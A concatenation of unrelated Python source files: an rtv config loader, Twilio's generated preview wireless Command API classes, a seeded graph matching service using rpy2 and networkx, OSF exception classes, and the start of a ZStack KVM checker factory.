return item in self._set
def __len__(self):
return len(self._list)
def __getitem__(self, item):
return self._list[item]
def add(self, item):
self._set.add(item)
self._list.append(item)
class Config(object):
"""
This class manages the loading and saving of configs and other files.
"""
def __init__(self, history_file=HISTORY, token_file=TOKEN, **kwargs):
self.history_file = history_file
self.token_file = token_file
self.config = kwargs
default, bindings = self.get_file(DEFAULT_CONFIG)
self.default = default
self.keymap = KeyMap(bindings)
# `refresh_token` and `history` are saved/loaded at separate locations,
# so they are treated differently from the rest of the config options.
self.refresh_token = None
self.history = OrderedSet()
def __getitem__(self, item):
if item in self.config:
return self.config[item]
else:
return self.default.get(item, None)
def __setitem__(self, key, value):
self.config[key] = value
def __delitem__(self, key):
self.config.pop(key, None)
def update(self, **kwargs):
self.config.update(kwargs)
def load_refresh_token(self):
if os.path.exists(self.token_file):
with open(self.token_file) as fp:
self.refresh_token = fp.read().strip()
else:
self.refresh_token = None
def save_refresh_token(self):
self._ensure_filepath(self.token_file)
with open(self.token_file, 'w+') as fp:
fp.write(self.refresh_token)
def delete_refresh_token(self):
if os.path.exists(self.token_file):
os.remove(self.token_file)
self.refresh_token = None
def load_history(self):
if os.path.exists(self.history_file):
with codecs.open(self.history_file, encoding='utf-8') as fp:
self.history = OrderedSet([line.strip() for line in fp])
else:
self.history = OrderedSet()
def save_history(self):
self._ensure_filepath(self.history_file)
with codecs.open(self.history_file, 'w+', encoding='utf-8') as fp:
fp.writelines('\n'.join(self.history[-self['history_size']:]))
def delete_history(self):
if os.path.exists(self.history_file):
os.remove(self.history_file)
self.history = OrderedSet()
@staticmethod
def get_args():
"""
Load settings from the command line.
"""
parser = build_parser()
args = vars(parser.parse_args())
# Overwrite the deprecated "-l" option into the link variable
if args['link_deprecated'] and args['link'] is None:
args['link'] = args['link_deprecated']
args.pop('link_deprecated', None)
# Filter out argument values that weren't supplied
return {key: val for key, val in args.items() if val is not None}
@classmethod
def get_file(cls, filename=None):
"""
Load settings from an rtv configuration file.
"""
if filename is None:
filename = CONFIG
config = configparser.ConfigParser()
if os.path.exists(filename):
with codecs.open(filename, encoding='utf-8') as fp:
config.readfp(fp)
return cls._parse_rtv_file(config)
@staticmethod
def _parse_rtv_file(config):
rtv = {}
if config.has_section('rtv'):
rtv = dict(config.items('rtv'))
# convert non-string params to their typed representation
params = {
'ascii': partial(config.getboolean, 'rtv'),
'monochrome': partial(config.getboolean, 'rtv'),
'persistent': partial(config.getboolean, 'rtv'),
'autologin': partial(config.getboolean, 'rtv'),
'clear_auth': partial(config.getboolean, 'rtv'),
'enable_media': partial(config.getboolean, 'rtv'),
'history_size': partial(config.getint, 'rtv'),
'oauth_redirect_port': partial(config.getint, 'rtv'),
'oauth_scope': lambda x: rtv[x].split(','),
'max_comment_cols': partial(config.getint, 'rtv'),
'max_pager_cols': partial(config.getint, 'rtv'),
'hide_username': partial(config.getboolean, 'rtv'),
'flash': partial(config.getboolean, 'rtv'),
'force_new_browser_window': partial(config.getboolean, 'rtv')
}
for key, func in params.items():
if key in rtv:
rtv[key] = func(key)
bindings = {}
if config.has_section('bindings'):
bindings = dict(config.items('bindings'))
for name, keys in bindings.items():
bindings[name] = [key.strip() for key in keys.split(',')]
return rtv, bindings
@staticmethod
def _ensure_filepath(filename):
"""
Ensure that the directory exists before trying to write to the file.
"""
filepath = os.path.dirname(filename)
if not os.path.exists(filepath):
os.makedirs(filepath)
|
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class CommandList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version):
"""
Initialize the CommandList
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.wireless.command.CommandList
:rtype: twilio.rest.preview.wireless.command.CommandList
"""
super(CommandList, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/Commands'.format(**self._solution)
def stream(self, device=values.unset, sim=values.unset, status=values.unset,
direction=values.unset, limit=None, page_size=None):
"""
Streams CommandInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode device: The device
:param unicode sim: The sim
:param unicode status: The status
:param unicode direction: The direction
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.command.CommandInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
device=device,
sim=sim,
status=status,
direction=direction,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, device=values.unset, sim=values.unset, status=values.unset,
direction=values.unset, limit=None, page_size=None):
"""
Lists CommandInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode device: The device
:param unicode sim: The sim
:param unicode status: The status
:param unicode direction: The direction
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.command.CommandInstance]
"""
return list(self.stream(
device=device,
sim=sim,
status=status,
direction=direction,
limit=limit,
page_size=page_size,
))
def page(self, device=values.unset, sim=values.unset, status=values.unset,
direction=values.unset, page_token=values.unset,
page_number=values.unset, page_size=values.unset):
"""
Retrieve a single page of CommandInstance records from the API.
Request is executed immediately
:param unicode device: The device
:param unicode sim: The sim
:param unicode status: The status
:param unicode direction: The direction
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandPage
"""
params = values.of({
'Device': device,
'Sim': sim,
'Status': status,
'Direction': direction,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return CommandPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of CommandInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return CommandPage(self._version, response, self._solution)
def create(self, command, device=values.unset, sim=values.unset,
callback_method=values.unset, callback_url=values.unset,
command_mode=values.unset, include_sid=values.unset):
"""
Create a new CommandInstance
:param unicode command: The command
:param unicode device: The device
:param unicode sim: The sim
:param unicode callback_method: The callback_method
:param unicode callback_url: The callback_url
:param unicode command_mode: The command_mode
:param unicode include_sid: The include_sid
:returns: Newly created CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
data = values.of({
'Command': command,
'Device': device,
'Sim': sim,
'CallbackMethod': callback_method,
'CallbackUrl': callback_url,
'CommandMode': command_mode,
'IncludeSid': include_sid,
})
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return CommandInstance(self._version, payload, )
def get(self, sid):
"""
Constructs a CommandContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.command.CommandContext
:rtype: twilio.rest.preview.wireless.command.CommandContext
"""
return CommandContext(self._version, sid=sid, )
def __call__(self, sid):
"""
Constructs a CommandContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.command.CommandContext
:rtype: twilio.rest.preview.wireless.command.CommandContext
"""
return CommandContext(self._version, sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.CommandList>'
class CommandPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, response, solution):
"""
Initialize the CommandPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.preview.wireless.command.CommandPage
:rtype: twilio.rest.preview.wireless.command.CommandPage
"""
super(CommandPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of CommandInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.preview.wireless.command.CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
return CommandInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.CommandPage>'
class CommandContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, sid):
"""
Initialize the CommandContext
:param Version version: Version that contains the resource
:param sid: The sid
:returns: twilio.rest.preview.wireless.command.CommandContext
:rtype: twilio.rest.preview.wireless.command.CommandContext
"""
super(CommandContext, self).__init__(version)
# Path Solution
self._solution = {'sid': sid, }
self._uri = '/Commands/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch a CommandInstance
:returns: Fetched CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return CommandInstance(self._version, payload, sid=self._solution['sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.CommandContext {}>'.format(context)
class CommandInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, payload, sid=None):
"""
Initialize the CommandInstance
:returns: twilio.rest.preview.wireless.command.CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
super(CommandInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'account_sid': payload.get('account_sid'),
'device_sid': payload.get('device_sid'),
'sim_sid': payload.get('sim_sid'),
'command': payload.get('command'),
'command_mode': payload.get('command_mode'),
'status': payload.get('status'),
'direction': payload.get('direction'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: CommandContext for this CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandContext
"""
if self._context is None:
self._context = CommandContext(self._version, sid=self._solution['sid'], )
return self._context
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def device_sid(self):
"""
:returns: The device_sid
:rtype: unicode
"""
return self._properties['device_sid']
@property
def sim_sid(self):
"""
:returns: The sim_sid
:rtype: unicode
"""
return self._properties['sim_sid']
@property
def command(self):
"""
:returns: The command
:rtype: unicode
"""
return self._properties['command']
@property
def command_mode(self):
"""
:returns: The command_mode
:rtype: unicode
"""
return self._properties['command_mode']
@property
def status(self):
"""
:returns: The status
:rtype: unicode
"""
return self._properties['status']
@property
def direction(self):
"""
:returns: The direction
:rtype: unicode
"""
return self._properties['direction']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def url(self):
"""
:returns: The url
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch a CommandInstance
:returns: Fetched CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
return self._proxy.fetch()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.CommandInstance {}>'.format(context)
|
|
import bson
import bson.json_util
import pymongo
import json
from bson import ObjectId
# from pymongo import Connection
import string
import tangelo
import numpy as np
import networkx as nx
from networkx.readwrite import json_graph
import rpy2.robjects as robjects
import rpy2.robjects.numpy2ri
rpy2.robjects.numpy2ri.activate()
# services wrapper around the Seeded Graph Matching algorithm developed by the Johns Hopkins XDATA team. First several
# support routines are listed, then at the bottom, the main interfacd routine.
def addNodesToGraph(g,count):
current_node_count = len(g.nodes())
for count in range(count):
g.add_node(current_node_count+count)
# return common names and the matching ID pairs from a pair of graphs. This uses the 'name' attribute on each
# node to find and return a set of nodes where the names matched. This can be used to generate seeds for a
# graph, where it is known that the corresponding entities are supposed to be paired.
def returnCommonMatches(ga,gb):
#first, build dictionaries off all the names
gaNames = {}
gbNames = {}
matchingdict = {}
# insert the names into dictionaries so we have a unique list, eliminate duplicates
for name in nx.get_node_attributes(ga,'name').values():
gaNames[name] = name
for name in nx.get_node_attributes(gb,'name').values():
gbNames[name] = name
for name in gaNames.keys():
if name in gbNames.keys():
# find the nodeIDs for this name
id_a = nameToNode(ga,name)
id_b = nameToNode(gb,name)
matchingdict[name] = [id_a,id_b]
return matchingdict
# this shuffles the nodes so any nodes identified in the seed list are placed at the beginning of the list of
# nodes in the graph. This is a necessary precondition for the SGM algorithm. It assumes the first m of n
# vertices in each of the graphs, correspond to the seeds.
def rearrangeGraphWithSeeds(ingraph,seedList):
# this routine expects a graph with node IDs as character strings of integegers (e.g. '0', '1', etc.)
# which is the way networkX reads graphML files. This routine recognizes a set of seed nodes
# as seeds and swaps nodes so the seeds are always in the beginning of the graph.
head = 0
substitutions = {}
# copy the seeds into the front of the graph
for seednode in seedList:
# generally we want to move from the head, but there is a special case that will override
# this, so a variable is needed
source = head
# if the seed node and head are equal, we don't have to swap anything
if seednode != head:
if head in ingraph.nodes():
# if the node pointed to by seednode has already been moved by a previous seed, then
# make this substitution against the node in its new location.
if seednode in substitutions.keys():
source = substitutions[seednode]
destination = head
else:
destination = seednode
#print "Seed: ", seednode, "Head: ", head, "Source: ", source, "Destination: ", destination
# there is already a node where we want to put this seed. Swap the nodes
mapping = {source : 'temp'}
ingraph = nx.relabel_nodes(ingraph,mapping,copy=False)
mapping = {destination: source}
ingraph = nx.relabel_nodes(ingraph,mapping,copy=False)
mapping = {'temp' : destination}
ingraph = nx.relabel_nodes(ingraph,mapping,copy=False)
substitutions[source] = destination
else:
# no node exists where we want to put the seed, just relabel the node
mapping = {seednode: source}
ingraph = nx.relabel_nodes(ingraph,mapping,copy=False)
# this moves even on the case where the seed matches the head
head = head+ 1
return substitutions
def findCorrespondingNodeInMatrix(mat,size, seedcount,node):
# we are looking for which element of the nodes row is set
found = False
for colindex in range(size):
offset = (node-1)*size+colindex
if mat[offset] == 1:
found = True;
return colindex
if (found == False):
print "error, couldn't find matching node for ",node
# was having trouble doing the linear indexing into the result array above, so use R to evaluate
# the sparse matrix
def findCorrespondingNodeInSparseMatrix(mat,size, seedcount,node):
# we are looking for which element of the nodes row is set
found = False
for colindex in range(size-seedcount-1):
# make a 2D query because not sure how to index python object successfully
content = 'P$D['+str(node+1)+','+str(colindex+1)+']'
if robjects.r(content)[0] > 0:
found = True;
return colindex
if (found == False):
#print "error, couldn't find matching node for ",node
return -1
def findCorrelatedNode(size, seedcount,node):
# we are looking for which element of the nodes row is set
found = False
corr = np.array(robjects.r('P$corr'))
# make a 1D query because not sure how to index python object successfully
matching = corr[node,1]
return matching-1
def run(graphAnodes,graphAedges,graphBnodes,graphBedges,seeds):
# building graphA, graphB networkX structures from the separate node & link structures
# passed from javascript. For the moment, we don't allow multiple links between edges or directed edges
# first decode the argument from being passed through a URL
graphAnodes_obj = bson.json_util.loads(graphAnodes)
graphAedges_obj = bson.json_util.loads(graphAedges)
graphBnodes_obj = bson.json_util.loads(graphBnodes)
graphBedges_obj = bson.json_util.loads(graphBedges)
seed_obj = bson.json_util.loads(seeds)
# for some reason, edges are coming across pre-linked with nodes, lets just extract out
print "reassembling graph A and B"
# start with an empty graph instance
ga = nx.Graph()
# traverse through the nodes from the app and add them to the new graph instance
for value in graphAnodes_obj.itervalues():
print value
ga.add_node(value['id'])
# add node attributes, like name, etc. to new node
for attrib in value['data'][1]:
#print 'found attrib:', attrib
ga.node[value['id']][attrib] = value['data'][1][attrib]
# traverse through the edges
for link in graphAedges_obj.itervalues():
#print link
ga.add_edge(link['source'],link['target'])
print "received graph A:"
print ga.nodes()
#print ga.edges()
# start with an empty graph instance
gb = nx.Graph()
# traverse through the nodes from the app and add them to the new graph instance
for value in graphBnodes_obj.itervalues():
print value
gb.add_node(value['id'])
# add node attributes, like name, etc. to new node
for attrib in value['data'][1]:
#print 'found attrib:', attrib
gb.node[value['id']][attrib] = value['data'][1][attrib]
# traverse through the edges
for link in graphBedges_obj.itervalues():
#print link
gb.add_edge(link['source'],link['target'])
print "received graph B:"
print gb.nodes()
#print gb.edges()
nx.write_gml(ga,"/tmp/ga.gml")
nx.write_gml(gb,"/tmp/gb.gml")
# initialize igraph to get JHU SGM algorithm
robjects.r('library(igraph)')
# check the nunber of nodes between the two graphs and add nodes to the smaller graph, so the have
# the same number of nodes. The initial version of SGM in igraph required the same cardinality between
# nodes sets. This has since been relaxed, but this step is included in case.
ga_num_nodes = len(ga.nodes())
gb_num_nodes = len(gb.nodes())
ga_larger_count = ga_num_nodes - gb_num_nodes
print "graph a is larger by: ", ga_larger_count, ' nodes'
if ga_larger_count > 0:
addNodesToGraph(gb,abs(ga_larger_count))
else:
addNodesToGraph(ga,abs(ga_larger_count))
# now both should have the same cardinality
print nx.info(ga)
print nx.info(gb)
num_nodes = len(ga.nodes())
num_seeds = len(seed_obj)
# get integer node labels
gan = nx.convert_node_labels_to_integers(ga)
gbn = nx.convert_node_labels_to_integers(gb)
# now make separate lists of seeds for each graph
ga_seeds = []
gb_seeds = []
for seed in seed_obj:
ga_seeds.append(seed['ga'])
gb_seeds.append(seed['gb'])
print "seed_obj:"
print seed_obj
print "ga_seeds:"
print ga_seeds
print "gb_seeds:"
print gb_seeds
# re-arrange the graphs so the seeds are the first nodes in the graph and will be the lowest
# indices in the adjacency matrix
ga_substitutions = rearrangeGraphWithSeeds(gan,ga_seeds)
gb_substitutions = rearrangeGraphWithSeeds(gbn,gb_seeds)
print '----- substitutions ga -----'
print ga_substitutions
print '----- substitutions gb -----'
print gb_substitutions
print 'Graph A with seeds:'
for n in gan.nodes():
print n, gan.node[n]
print 'Graph B with seeds:'
for n in gbn.nodes():
print n, gbn.node[n]
# temporarily write out as a GraphML format (which preserved node order, then read back in on the igraph
# side. This is probably unnecessary, but it was done in the initial prototypes, so preserved here. )
A_adj = np.array(nx.to_numpy_matrix(gan))
B_adj = np.array(nx.to_numpy_matrix(gbn))
# Writing graphs for testing purposes
nx.write_gml(gan,"/tmp/gan_seeds.gml")
nx.write_gml(gbn,"/tmp/gbn_seeds.gml")
#robjects.r("gA <- read.graph('/tmp/gan_seeds.gml',format='graphML')")
#robjects.r("gB <- read.graph('/tmp/gbn_seeds.gml',format='graphML')")
# convert to an adjacency matrix for the SGM algorithm
#robjects.r("matA <- as.matrix(A_adj)")
#robjects.r("matB <- as.matrix(B_adj)")
robjects.r.assign("matA", A_adj)
robjects.r.assign("matB", B_adj)
#print robjects.r("gA")
#print robjects.r("gB")
# initialize the start matrix. This is set to uniform values initially, but I think this is
# somewhat sensitive to data values
number_of_nonseed_nodes = num_nodes - num_seeds
# start with a completely uniform start matrix
commandstring = 'startMatrix = matrix( 1/'+str(number_of_nonseed_nodes)+', '+str(number_of_nonseed_nodes)+','+str(number_of_nonseed_nodes)+')'
print 'executing: ',commandstring
robjects.r(commandstring)
# run SGM on the two adjacency matrices
commandstring = 'P <- match_vertices(matA,matB,m='+str(num_seeds)+',start=startMatrix,100)'
print 'executing: ',commandstring
robjects.r(commandstring)
# pull graph match results back from igraph
result = robjects.r('P$corr')
#print robjects.r('P$D')
#print robjects.r('P$P')
#print 'result copied to python:'
#print result
sizeP = robjects.r('nrow(P$P)')
# copy results into a new 'matching list' that relates the network from the results discovered by SGM. Since the graph was re-arranged
# for the seeds before going into SGM, we need to use the ID field from the node, so they match up with the networks in the calling application.
print 'number of matches returned:',sizeP
print sizeP[0]
matches = []
# copy over the match for the seeds
for index in range(num_seeds):
record = {'ga': gan.node[index]['id'], 'gb': gbn.node[index]['id'],}
matches.append(record)
print index, gan.node[index], gbn.node[index]
# now copy over the links returned from SGM
for index in range(0,number_of_nonseed_nodes):
mappedNode = findCorrelatedNode(number_of_nonseed_nodes,num_seeds,index)
if (mappedNode>0 and ('id' in gan.node[index+num_seeds]) and ('id' in gbn.node[mappedNode])):
print index+num_seeds,mappedNode,gan.node[index+num_seeds],gbn.node[mappedNode]
record = {'ga': gan.node[index+num_seeds]['id'], 'gb': gbn.node[mappedNode]['id']}
matches.append(record)
print 'matches:',matches
# Create an empty response object, then add the output data
response = {}
response['result'] = {}
response['result']['matches'] = matches
# Return the response object.
return json.dumps(response)
|
|
import contextlib
from django.core.exceptions import ValidationError as DjangoValidationError
# Remants from MODM days
# TODO: Remove usages of aliased Exceptions
ValidationError = DjangoValidationError
ValidationValueError = DjangoValidationError
ValidationTypeError = DjangoValidationError
class TokenError(Exception):
pass
class TokenHandlerNotFound(TokenError):
def __init__(self, action, *args, **kwargs):
super(TokenHandlerNotFound, self).__init__(*args, **kwargs)
self.action = action
class UnsupportedSanctionHandlerKind(Exception):
pass
class OSFError(Exception):
"""Base class for exceptions raised by the Osf application"""
pass
class NodeError(OSFError):
"""Raised when an action cannot be performed on a Node model"""
pass
class NodeStateError(NodeError):
"""Raised when the Node's state is not suitable for the requested action
Example: Node.remove_node() is called, but the node has non-deleted children
"""
pass
class UserStateError(OSFError):
"""Raised when the user's state is not suitable for the requested action
Example: user.gdpr_delete() is called, but the user has resources that cannot be deleted.
"""
pass
class SanctionTokenError(TokenError):
"""Base class for errors arising from the user of a sanction token."""
pass
class MaxRetriesError(OSFError):
"""Raised when an operation has been attempted a pre-determined number of times"""
pass
class InvalidSanctionRejectionToken(TokenError):
"""Raised if a Sanction subclass disapproval token submitted is invalid
or associated with another admin authorizer
"""
message_short = 'Invalid Token'
message_long = 'This disapproval link is invalid. Are you logged into the correct account?'
class InvalidSanctionApprovalToken(TokenError):
"""Raised if a Sanction subclass approval token submitted is invalid
or associated with another admin authorizer
"""
message_short = 'Invalid Token'
message_long = 'This approval link is invalid. Are you logged into the correct account?'
class InvalidTagError(OSFError):
"""Raised when attempting to perform an invalid operation on a tag"""
pass
class TagNotFoundError(OSFError):
"""Raised when attempting to perform an operation on an absent tag"""
pass
class UserNotAffiliatedError(OSFError):
"""Raised if a user attempts to add an institution that is not currently
one of its affiliations.
"""
message_short = 'User not affiliated'
message_long = 'This user is not affiliated with this institution.'
@contextlib.contextmanager
def reraise_django_validation_errors():
"""Context manager to reraise DjangoValidationErrors as `osf.exceptions.ValidationErrors` (for
MODM compat).
"""
try:
yield
except DjangoValidationError as err:
raise ValidationError(*err.args)
class NaiveDatetimeException(Exception):
pass
class InvalidTriggerError(Exception):
def __init__(self, trigger, state, valid_triggers):
self.trigger = trigger
self.state = state
self.valid_triggers = valid_triggers
self.message = 'Cannot trigger "{}" from state "{}". Valid triggers: {}'.format(trigger, state, valid_triggers)
super(Exception, self).__init__(self.message)
class InvalidTransitionError(Exception):
def __init__(self, machine, transition):
self.message = 'Machine "{}" received invalid transitions: "{}" expected but not defined'.format(machine, transition)
class PreprintError(OSFError):
"""Raised when an action cannot be performed on a Preprint model"""
pass
class PreprintStateError(PreprintError):
"""Raised when the Preprint's state is not suitable for the requested action"""
pass
class DraftRegistrationStateError(OSFError):
"""Raised when an action cannot be performed on a Draft Registration model"""
pass
class PreprintProviderError(PreprintError):
"""Raised when there is an error with the preprint provider"""
pass
class BlockedEmailError(OSFError):
"""Raised if a user tries to register an email that is included
in the blocked domains list
"""
pass
class SchemaBlockConversionError(OSFError):
"""Raised if unexpected data breaks the conversion between the legacy
nested registration schema/metadata format and the new, flattened,
'schema block' format.
"""
pass
class SchemaResponseError(OSFError):
"""Superclass for errors ariseing from unexpected SchemaResponse behavior."""
pass
class SchemaResponseStateError(SchemaResponseError):
"""Raised when attempting to perform an operation against a
SchemaResponse with an invalid state.
"""
pass
class PreviousSchemaResponseError(SchemaResponseError):
"""Raised when attempting to create a new SchemaResponse for a parent that
already has a SchemaResponse in an unsupported state
"""
pass
class RegistrationBulkCreationRowError(OSFError):
"""Raised if a draft registration failed creation during bulk upload"""
def __init__(self, upload_id, row_id, title, external_id, draft_id=None, error=None, approval_failure=False):
# `draft_id` is provided when the draft is created but not related to the row object
self.draft_id = draft_id
# `approval_failure` determines whether the error happens during the approval process
self.approval_failure = approval_failure
# The error information for logging, sentry and email
self.error = error if error else 'Draft registration creation error'
# The short error message to be added to the error list that will be returned to the initiator via email
self.short_message = 'Title: {}, External ID: {}, Error: {}'.format(title, external_id, error)
# The long error message for logging and sentry
self.long_message = 'Draft registration creation failed: [upload_id="{}", row_id="{}", title="{}", ' \
'external_id="{}", error="{}"]'.format(upload_id, row_id, title, external_id, error)
class SchemaResponseUpdateError(SchemaResponseError):
"""Raised when assigning an invalid value (or key) to a SchemaResponseBlock."""
def __init__(self, response, invalid_responses=None, unsupported_keys=None):
self.invalid_responses = invalid_responses
self.unsupported_keys = unsupported_keys
invalid_response_message = ''
unsupported_keys_message = ''
if invalid_responses:
invalid_response_message = (
f'\nThe following responses had invalid values: {invalid_responses}'
)
if unsupported_keys:
unsupported_keys_message = (
f'\nReceived the following resposnes had invalid keys: {unsupported_keys}'
)
error_message = (
f'Error update SchemaResponse with id [{response._id}]:'
f'{invalid_response_message}{unsupported_keys_message}'
)
super().__init__(error_message)
|
|
'''
Zstack KVM Checker Factory.
@author: YYK
'''
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.header.vm as vm_header
import zstackwoodpecker.header.volume as volume_header
import zstackwoodpecker.header.image as image_header
import zstackwoodpecker.header.security_group as sg_header
import zstackwoodpecker.header.port_forwarding as pf_header
import zstackwoodpecker.header.vip as vip_header
import zstackwoodpecker.header.load_balancer as lb_header
import zstackwoodpecker.header.checker as checker_header
import zstackwoodpecker.zstack_test.zstack_checker.zstack_db_checker as db_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_vm_checker as vm_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_volume_checker as volume_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_image_checker as image_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_security_group_checker as sg_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_port_forwarding_checker as pf_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_host_checker as host_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_eip_checker as eip_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_vip_checker as vip_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_snapshot_checker as sp_checker
import zstackwoodpecker.zstack_test.kvm_checker.zstack_kvm_load_balancer_checker as lb_checker
import zstackwoodpecker.test_util as test_util
import apibinding.inventory as inventory
class KvmVmCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_vm_checker_chain = checker_header.CheckerChain()
checker_dict = {}
if test_obj.state == vm_header.RUNNING:
checker_dict[vm_checker.zstack_kvm_vm_set_host_vlan_ip] = True
checker_dict[db_checker.zstack_vm_db_checker] = True
checker_dict[vm_checker.zstack_kvm_vm_running_checker] = True
#if behind of VR
vrs = test_lib.lib_find_vr_by_vm(test_obj.vm)
if vrs:
svr_types = test_lib.lib_get_l3s_service_type(test_obj.vm)
#The first DHCP checker will wait for VM start up.
if 'DHCP' in svr_types:
checker_dict[vm_checker.zstack_kvm_vm_dhcp_checker] = True
checker_dict[vm_checker.zstack_kvm_vm_network_checker] = True
#if guest can't get IP address from DHCP, auto case can
# not test DNS feature.
if 'DNS' in svr_types:
checker_dict[vm_checker.zstack_kvm_vm_dns_checker] \
= True
else:
checker_dict[vm_checker.zstack_kvm_vm_dns_checker] \
= False
else:
checker_dict[vm_checker.zstack_kvm_vm_dhcp_checker] = False
checker_dict[vm_checker.zstack_kvm_vm_network_checker] \
= False
if 'SNAT' in svr_types:
checker_dict[vm_checker.zstack_kvm_vm_snat_checker] = True
else:
checker_dict[vm_checker.zstack_kvm_vm_snat_checker] = False
#if 'PortForwarding' in svr_types:
# checker_dict[vm_checker.zstack_kvm_vm_dnat_checker] = True
#else:
# checker_dict[vm_checker.zstack_kvm_vm_dnat_checker] = False
else:
sp_types = test_lib.lib_get_vm_l3_service_provider_types(test_obj.vm)
if 'Flat' in sp_types:
checker_dict[vm_checker.zstack_kvm_vm_ssh_no_vr_checker] = True
if test_obj.get_creation_option().get_default_l3_uuid():
checker_dict[vm_checker.zstack_kvm_vm_default_l3_checker] = True
elif test_obj.state == vm_header.STOPPED:
checker_dict[db_checker.zstack_vm_db_checker] = True
#stopped_checker is deprecated, since the stopped vm will be removed
#from host.
#checker_dict[vm_checker.zstack_kvm_vm_stopped_checker] = True
elif test_obj.state == vm_header.DESTROYED:
#VM destroy will cause vm structure be removed from DB, when VmExpungeInterval is set to 1, so doesn't need to check destroyed state sync in db in most case.
